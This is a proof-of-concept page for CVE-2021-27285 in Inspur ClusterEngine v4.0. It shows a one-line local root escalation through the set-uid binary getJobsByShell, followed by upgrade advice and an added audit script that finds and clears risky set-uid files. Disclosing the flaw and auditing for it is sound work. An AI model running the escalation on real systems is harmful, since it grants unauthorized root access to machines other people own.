CVE-2021-27285 PoC — Inspur ClusterEngine Security Vulnerability

Source
Associated Vulnerability
Title: Inspur ClusterEngine Security Vulnerability (CVE-2021-27285)
Description: An issue was discovered in Inspur ClusterEngine v4.0 that allows attackers to gain escalated local privileges and execute arbitrary commands via /opt/tsce4/torque6/bin/getJobsByShell.
Readme
# CVE-2021-27285

Inspur ClusterEngine is a job management platform built specifically for Inspur's TianSuo series HPC products. An improper SUID configuration in Inspur ClusterEngine allows non-administrative users to escalate privileges and obtain root access through certain components.

In Inspur ClusterEngine v4.0, the [component](getJobsByShell) "/opt/tsce4/torque6/bin/getJobsByShell" has an improper SUID configuration, so a non-administrative user can gain root privileges through the SUID mechanism.

The privilege escalation process is as follows:

```bash
$ whoami
user1
$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
# whoami
root
#
```

Remediation advice: upgrade (patch) the relevant components.
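To find exposure of this kind on a host, the following added example (not part of the original README or of Inspur's software) lists set-uid files that any local account can execute and that are not on a reviewed allowlist. The function names `audit_suid` and `clear_suid` and the allowlist file are assumptions made for illustration; `/opt/tsce4` is the install prefix from the path above.

```shell
#!/bin/sh
# Added example: audit a directory tree for set-uid files of the kind
# described above (set-uid AND runnable by every local user).

# audit_suid ROOT [ALLOWLIST]
# Prints each regular file under ROOT that has the set-uid bit and is
# executable by "other", skipping paths listed one per line in ALLOWLIST
# (hypothetical file of reviewed binaries). Returns 1 if anything is found.
audit_suid() {
    as_root=$1
    as_allow=${2:-/dev/null}
    as_hits=$(find "$as_root" -type f -perm -4000 -perm -0001 -print 2>/dev/null \
              | grep -vxFf "$as_allow" | sort)
    if [ -z "$as_hits" ]; then
        return 0
    fi
    printf '%s\n' "$as_hits"
    return 1
}

# clear_suid FILE
# Interim measure until the component is upgraded: drop the set-uid and
# set-gid bits so the file runs with the caller's own privileges.
# Assumption: the product may depend on the bit, so test before rollout.
clear_suid() {
    chmod u-s,g-s -- "$1"
}

# Run as a script with a directory argument, e.g.:
#   sh audit_suid.sh /opt/tsce4 /etc/suid-allowlist.txt
if [ "$#" -gt 0 ]; then
    audit_suid "$@"
fi
```

A non-zero exit status means at least one unreviewed set-uid file was found, which makes the script easy to wire into a scheduled compliance check.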








File Snapshot

[4.0K] /data/pocs/b7cc6625bd5a4ab4ae7cde3bce32ae5f654af028
├── [8.5K] getJobsByShell
└── [1.3K] README.md

0 directories, 2 files